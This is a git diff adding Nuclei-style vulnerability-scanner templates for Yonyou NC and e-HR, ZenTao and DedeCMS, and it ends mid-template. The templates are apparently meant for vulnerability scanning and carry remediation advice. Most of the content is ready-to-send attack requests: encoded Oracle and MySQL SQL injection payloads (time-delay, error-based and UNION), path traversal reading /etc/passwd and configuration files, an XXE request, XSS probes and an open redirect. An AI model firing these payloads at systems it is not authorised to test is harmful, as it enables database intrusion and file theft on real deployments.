'{{BaseURL}}/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID=' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213NC/yonyou_NC-sqli-attach_download_d.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213NC/yonyou_NC-sqli-attach_download_d.yaml" new file mode 100755 index 000000000..3d7fadd4d --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213NC/yonyou_NC-sqli-attach_download_d.yaml" @@ -0,0 +1,56 @@ +id: yonyou_NC-sqli-attach_download_d +info: + name: 用友NC attach.download.d SQL注入漏洞 + author: + - 折跃 + description: | + 用友NC attach.download.d SQL注入漏洞 + 用友NC是一款大型erp企业管理系统与电子商务平台。 + + 用友NC存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==302 && status_code_2==302 && (contains(all_headers_1,'SQLException') + || contains(all_headers_1,'Error')) + - 'regex(''Location: (.*)'',all_headers_1) != regex(''Location: (.*)'',all_headers_2)' + path: + - '{{BaseURL}}/hrss/attach.download.d?appName=PSNBASDOC_RM&pkAttach=null%27%20AND%206046%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7C%28REPLACE%28REPLACE%28REPLACE%28REPLACE%28%28SELECT%20NVL%28CAST%28COUNT%28OWNER%29%20AS%20VARCHAR%284000%29%29%2CCHR%2832%29%29%20FROM%20%28SELECT%20DISTINCT%28OWNER%29%20FROM%20SYS.ALL_TABLES%29%29%2CCHR%2832%29%2CCHR%28113%29%7C%7CCHR%28108%29%7C%7CCHR%28113%29%29%2CCHR%2836%29%2CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%29%2CCHR%2864%29%2CCHR%28113%29%7C%7CCHR%28100%29%7C%7CCHR%28113%29%29%2CCHR%2835%29%2CCHR%28113%29%7C%7CCHR%28102%29%7C%7CCHR%28113%29%29%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27GbdE%27%3D%27GbdE' + - '{{BaseURL}}/hrss/attach.download.d?appName=PSNBASDOC_RM&pkAttach=null&Ojtt%3D8516%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2C2%2C3%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%20..%2F..%2F..%2Fetc%2Fpasswd' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==302 && status_code_2==302 && (contains(all_headers_1,'SQLException') + || contains(all_headers_1,'Error')) + - 'regex(''Location: (.*)'',all_headers_1) != regex(''Location: (.*)'',all_headers_2)' + path: + - '{{BaseURL}}/hrss/ref.show.d?refcode=HI000000000000000003%27%20AND%208684%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288684%3D8684%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28112%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27FrqA%27%3D%27FrqA' + - '{{BaseURL}}/hrss/ref.show.d?refcode=HI000000000000000003%27%29%20AND%208684%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288684%3D8684%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28112%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27RJDF%27%3D%27RJDF' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213NC/yonyou_sqli_LoginUI.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213NC/yonyou_sqli_LoginUI.yaml" new file mode 100755 index 000000000..b4f53dce8 --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213NC/yonyou_sqli_LoginUI.yaml" @@ -0,0 +1,48 @@ +id: yonyou_sqli_LoginUI +info: + name: 用友NC LoginUI SQL注入漏洞 + author: + - 折跃 + description: |- + 用友NC LoginUI SQL注入漏洞 + 用友NC是一款大型erp企业管理系统与电子商务平台。 + + 用友NC存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: or + dsl: + - status_code_1==200 && duration_1 >= 5 + - status_code_2==200 && duration_2 >= 5 + raw: + - | + POST /nc/servlet/nc.ui.iufo.login.LoginUI HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + + LoginButton=%e7%99%bb%e5%bd%95(Login)¤tDate=2015-09-02&dschoice=aorwpw5ufcw6&hidBack=&languagechoice=simpchn&operType=null&refrence=%e5%8f%82%e7%85%a7(Ref)&timeRef=%e5%8f%82%e7%85%a7(Ref)&UserCodeText=wxbsisqq&UserPassText=wxbsisqq&UserSeleLang=simpchn&UserUnitText=asd%27%29%20AND%208148%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2867%29%7C%7CCHR%2885%29%7C%7CCHR%2876%29%2C5%29%20AND%20%28%271%27%3D%271 + - | + POST /nc/servlet/nc.ui.iufo.login.LoginUI HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + + LoginButton=%e7%99%bb%e5%bd%95(Login)¤tDate=2015-09-02&dschoice=aorwpw5ufcw6&hidBack=&languagechoice=simpchn&operType=null&refrence=%e5%8f%82%e7%85%a7(Ref)&timeRef=%e5%8f%82%e7%85%a7(Ref)&UserCodeText=wxbsisqq&UserPassText=wxbsisqq&UserSeleLang=simpchn&UserUnitText=asd%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213\344\272\272\345\212\233\350\265\204\346\272\220\347\256\241\347\220\206\347\263\273\347\273\237\357\274\210e-HR\357\274\211/wooyun-2014-066512.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213\344\272\272\345\212\233\350\265\204\346\272\220\347\256\241\347\220\206\347\263\273\347\273\237\357\274\210e-HR\357\274\211/wooyun-2014-066512.yaml" new file mode 100755 index 000000000..14ede360f --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213\344\272\272\345\212\233\350\265\204\346\272\220\347\256\241\347\220\206\347\263\273\347\273\237\357\274\210e-HR\357\274\211/wooyun-2014-066512.yaml" @@ -0,0 +1,38 @@ +id: wooyun-2014-066512 +info: + name: 用友e-HR系统任意文件读取 + author: + - 折跃 + description: |- + 用友e-HR 任意文件读取漏洞 + 用友e-HR,用友人力资源管理系统,是一款人力资源管理软件。 + + 用友e-HR存在任意文件读取漏洞,攻击者可利用漏洞读取任意文件。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'') + - contains(body,'') + path: + - '{{BaseURL}}/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213\344\272\272\345\212\233\350\265\204\346\272\220\347\256\241\347\220\206\347\263\273\347\273\237\357\274\210e-HR\357\274\211/wooyun-2014-078679.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213\344\272\272\345\212\233\350\265\204\346\272\220\347\256\241\347\220\206\347\263\273\347\273\237\357\274\210e-HR\357\274\211/wooyun-2014-078679.yaml" new file mode 100755 index 000000000..9e2216656 --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213\344\272\272\345\212\233\350\265\204\346\272\220\347\256\241\347\220\206\347\263\273\347\273\237\357\274\210e-HR\357\274\211/wooyun-2014-078679.yaml" @@ -0,0 +1,35 @@ +id: wooyun-2014-078679 +info: + name: 用友 e-HR /hrss/attach.download.d 参数pkAttach 时间盲注 + author: + - 烽火戏诸侯 + description: "用友e-HR HRSS自助服务系统SQL注入漏洞\n用友HRSS自助系统提供了各级管理者及普通员工参与企业管理活动的途径,实现了集团型组织全员参与的人力资源管理模式;是人力资源服务的窗口,也是人力资源管理与沟通的平台。 + \n\n用友HRSS自助服务系统存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。" + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - duration >= 5 + path: + - '{{BaseURL}}/hrss/attach.download.d?appName=PSNBASDOC_RM&pkAttach=null%27%20AND%201%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2874%29%7C%7CCHR%2886%29%7C%7CCHR%28104%29%7C%7CCHR%28117%29%2C5%29%20AND%20%27a%27%3D%27a' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213\344\272\272\345\212\233\350\265\204\346\272\220\347\256\241\347\220\206\347\263\273\347\273\237\357\274\210e-HR\357\274\211/wooyun-2015-096676.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213\344\272\272\345\212\233\350\265\204\346\272\220\347\256\241\347\220\206\347\263\273\347\273\237\357\274\210e-HR\357\274\211/wooyun-2015-096676.yaml" new file mode 100755 index 000000000..aa75e1d07 --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213\344\272\272\345\212\233\350\265\204\346\272\220\347\256\241\347\220\206\347\263\273\347\273\237\357\274\210e-HR\357\274\211/wooyun-2015-096676.yaml" @@ -0,0 +1,33 @@ +id: wooyun-2015-096676 +info: + name: 用友HRSS自助服务系统存在任意文件读取漏洞 + author: + - 折跃 + description: "用友e-HR HRSS自助服务系统任意文件读取漏洞\n用友HRSS自助系统提供了各级管理者及普通员工参与企业管理活动的途径,实现了集团型组织全员参与的人力资源管理模式;是人力资源服务的窗口,也是人力资源管理与沟通的平台。 + \n\n用友HRSS自助服务系统存在任意文件读取漏洞,攻击者可利用漏洞读取任意文件。" + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.yonyou.com/ + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(all_headers,'const.js') + path: + - '{{BaseURL}}/hrss/dorado/smartweb2.loadConst.d?language=zh&country=\..\..\..\..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts%00.html' + - '{{BaseURL}}/hrss/dorado/smartweb2.loadConst.d?language=zh&country=\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd%00.html' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\347\224\250\345\217\213\344\272\272\345\212\233\350\265\204\346\272\220\347\256\241\347\220\206\347\263\273\347\273\237\357\274\210e-HR\357\274\211/yonyou_EHR-xxe-smartweb2.yaml" "b/config/51pwn/yaml/\347\224\250\345\217\213\344\272\272\345\212\233\350\265\204\346\272\220\347\256\241\347\220\206\347\263\273\347\273\237\357\274\210e-HR\357\274\211/yonyou_EHR-xxe-smartweb2.yaml" new file mode 100755 index 000000000..8c231af59 --- /dev/null +++ "b/config/51pwn/yaml/\347\224\250\345\217\213\344\272\272\345\212\233\350\265\204\346\272\220\347\256\241\347\220\206\347\263\273\347\273\237\357\274\210e-HR\357\274\211/yonyou_EHR-xxe-smartweb2.yaml" @@ -0,0 +1,40 @@ +id: yonyou_EHR-xxe-smartweb2 +info: + name: 用友e-HR系统XXE漏洞 + author: + - 折跃 + description: |- + 用友e-HR XXE漏洞 + 用友e-HR,用友人力资源管理系统,是一款人力资源管理软件。 + + 用友e-HR存在XXE漏洞,该漏洞源于程序没有正确的校验XML外部实体。 + severity: high + remediation: |2- + + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://www.yonyou.com/ + + 临时修复方案: + 1、禁用外部实体 + 2、过滤用户提交的XML数据,关键词:]>1

%26test;

&1404976068948 + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\347\246\205\351\201\223/Changdao-165-SQLi.yaml" "b/config/51pwn/yaml/\347\246\205\351\201\223/Changdao-165-SQLi.yaml" new file mode 100755 index 000000000..beadd0ff6 --- /dev/null +++ "b/config/51pwn/yaml/\347\246\205\351\201\223/Changdao-165-SQLi.yaml" @@ -0,0 +1,26 @@ +id: Changdao-165-SQLi +info: + name: 禅道 16.5 sql 注入 + author: + - l0ne1y + description: |- + 禅道 16.5 SQLi漏洞 + 禅道是第一款国产的开源项目管理软件,在禅道16.5版本存在前台SQLI,攻击者可利用该漏洞获取数据库信息。 + severity: high + remediation: |- + ## 官方方案 + 升级至最新版本. + + ## 临时方案 + 修改注入点数据库查询处为预编译形式,而不是原本的字符串拼接。 +requests: +- matchers: + - type: word + condition: or + words: + - sqli + - "~" + path: + - '{{BaseURL}}/zentao/user-login.html' + method: POST + body: account=admin%27+and+%28select+extractvalue%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%29%29%23 diff --git "a/config/51pwn/yaml/\347\273\207\346\242\246\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237 (DedeCMS)/CVE-2018-18608.yaml" "b/config/51pwn/yaml/\347\273\207\346\242\246\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237 (DedeCMS)/CVE-2018-18608.yaml" new file mode 100755 index 000000000..b63ba95e8 --- /dev/null +++ "b/config/51pwn/yaml/\347\273\207\346\242\246\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237 (DedeCMS)/CVE-2018-18608.yaml" @@ -0,0 +1,37 @@ +id: CVE-2018-18608 +info: + name: DedeCMS V5.7 - Cross Site Scripting + author: + - l0ne1y + description: |- + DedeCMS 跨站脚本漏洞 + DedeCMS(织梦内容管理系统)是中国卓卓网络(Desdev)科技有限公司的一套开源的集内容发布、编辑、管理检索等于一体的PHP网站内容管理系统(CMS)。 + + DedeCMS 5.7 SP2版本中的include/datalistcp.class.php文件的‘GetPageList’函数存在跨站脚本漏洞。攻击者可利用该漏洞注入任意的Web脚本或HTML。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.dedecms.com/ + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - '''>' + - DedeCMS Error Warning! + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/plus/feedback.php/rp4hu%27> + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/include/dialog/config.php?adminDirHand=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + method: GET diff --git "a/config/51pwn/yaml/\347\273\207\346\242\246\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237 (DedeCMS)/dedecms-guestbook-sqli.yaml" "b/config/51pwn/yaml/\347\273\207\346\242\246\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237 (DedeCMS)/dedecms-guestbook-sqli.yaml" new file mode 100755 index 000000000..1b108a23d --- /dev/null +++ "b/config/51pwn/yaml/\347\273\207\346\242\246\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237 (DedeCMS)/dedecms-guestbook-sqli.yaml" @@ -0,0 +1,49 @@ +id: dedecms-guestbook-sqli +info: + name: DedeCMS Membergroup SQLI + author: + - l0ne1y + description: |- + DedeCMS V5.7 SQL注入漏洞 + DedeCMS(织梦内容管理系统)是中国卓卓网络(Desdev)科技有限公司的一套开源的集内容发布、编辑、管理检索等于一体的PHP网站内容管理系统(CMS)。 + + DedeCMS 5.7版本中存在SQL注入漏洞。在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.dedecms.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 4、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 5、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 6、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 && status_code_3==200 + - contains(body_3,verify) + extractors: + - name: articleid + type: regex + regex: + - action=admin&id=((.*?)\d{1,20}) + group: 1 + part: body + internal: true + matchers-condition: and + path: + - '{{BaseURL}}/plus/guestbook.php' + - '{{BaseURL}}/plus/guestbook.php?action=admin&job=editok&id={{articleid}}&msg='''',msg=@`''''`,msg=(selecT + {{verify}}),email=' + - '{{BaseURL}}/plus/guestbook.php' + method: GET + redirects: true + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(8,"")}}' diff --git "a/config/51pwn/yaml/\347\273\207\346\242\246\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237 (DedeCMS)/dedecms-membergroup-sqli.yaml" "b/config/51pwn/yaml/\347\273\207\346\242\246\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237 (DedeCMS)/dedecms-membergroup-sqli.yaml" new file mode 100755 index 000000000..c1ed55a82 --- /dev/null +++ "b/config/51pwn/yaml/\347\273\207\346\242\246\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237 (DedeCMS)/dedecms-membergroup-sqli.yaml" @@ -0,0 +1,36 @@ +id: dedecms-membergroup-sqli +info: + name: DedeCMS Membergroup SQLI + author: + - l0ne1y + description: |- + DedeCMS SQL注入漏洞 + DedeCMS(织梦内容管理系统)是中国卓卓网络(Desdev)科技有限公司的一套开源的集内容发布、编辑、管理检索等于一体的PHP网站内容管理系统(CMS)。 + + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.dedecms.com/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 4、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 5、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 6、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: word + part: body + words: + - 52c69e3a57331081823331c4e69d3f2e + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`''`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`''`' + method: GET diff --git "a/config/51pwn/yaml/\347\273\207\346\242\246\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237 (DedeCMS)/dedecms-openredirect.yaml" "b/config/51pwn/yaml/\347\273\207\346\242\246\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237 (DedeCMS)/dedecms-openredirect.yaml" new file mode 100755 index 000000000..a9f60ad65 --- /dev/null +++ "b/config/51pwn/yaml/\347\273\207\346\242\246\345\206\205\345\256\271\347\256\241\347\220\206\347\263\273\347\273\237 (DedeCMS)/dedecms-openredirect.yaml" @@ -0,0 +1,33 @@ +id: dedecms-openredirect +info: + name: DedeCMS Open Redirect + author: + - l0ne1y + description: |- + DedeCMS URL重定向漏洞 + DedeCMS(织梦内容管理系统)是中国卓卓网络(Desdev)科技有限公司的一套开源的集内容发布、编辑、管理检索等于一体的PHP网站内容管理系统(CMS)。 + 织梦内容管理系统在plus/download.php文件中存在URL重定向漏洞。 + URL重定向(URL redirection,或称网址重定向或网域名称转址),是指当使用者浏览某个网址时,将他导向到另一个网址的技术。由于越来越多的应用需要和其他的第三方应用交互,以及在自身应用内部根据不同的逻辑将用户引向到不同的页面,譬如一个典型的登录接口就经常需要在认证成功之后将用户引导到登录之前的页面,整个过程中如果实现不严格就可能导致一些安全问题,特定条件下可能引起严重的安全漏洞。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.dedecms.com/ + + 临时修复方案: + 1、代码固定跳转地址,不让用户控制变量。 + 2、跳转目标地址采用白名单映射机制、只对合法的 URL 做跳转。 + 3、合理充分的校验校验跳转的目标地址,非己方地址时告知用户跳转风险。 +requests: +- matchers: + - type: word + part: header + words: + - 'Location: https://bing.com' + - type: status + status: + - 302 + matchers-condition: and + path: + - '{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo=' + method: GET diff --git "a/config/51pwn/yaml/\347\273\277\347\233\237\347\273\274\345\220\210\345\250\201\350\203\201\346\216\242\351\222\210\357\274\210NSFOCUS UTS\357\274\211/lvmeng-uts-disclosure.yaml" "b/config/51pwn/yaml/\347\273\277\347\233\237\347\273\274\345\220\210\345\250\201\350\203\201\346\216\242\351\222\210\357\274\210NSFOCUS UTS\357\274\211/lvmeng-uts-disclosure.yaml" new file mode 100755 index 000000000..4aba9c255 --- /dev/null +++ "b/config/51pwn/yaml/\347\273\277\347\233\237\347\273\274\345\220\210\345\250\201\350\203\201\346\216\242\351\222\210\357\274\210NSFOCUS UTS\357\274\211/lvmeng-uts-disclosure.yaml" @@ -0,0 +1,44 @@ +id: lvmeng-uts-disclosure +info: + name: Lvmeng UTS Disclosure + author: + - pikpikcu + description: |- + 绿盟综合威胁探针(NSFOCUS UTS)信息泄露漏洞 + 绿盟综合威胁探针(NSFOCUS UTS),是一款面向全行业的全流量威胁检测探针,集绿盟多年安全研究及威胁检测能力于一身,运用规则引擎、虚拟沙箱、威胁情报、机器学习等技术,具备识别广泛、检测精准、互联互通的特点,可面向不同场景检测和分析高级威胁,回溯安全事件。 + + 绿盟综合威胁探针(NSFOCUS UTS)存在信息泄露漏洞,可获取管理员密码登录后台 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://update.nsfocus.com/update/listBsaUtsDetail/v/F02 + + 临时修复方案: + 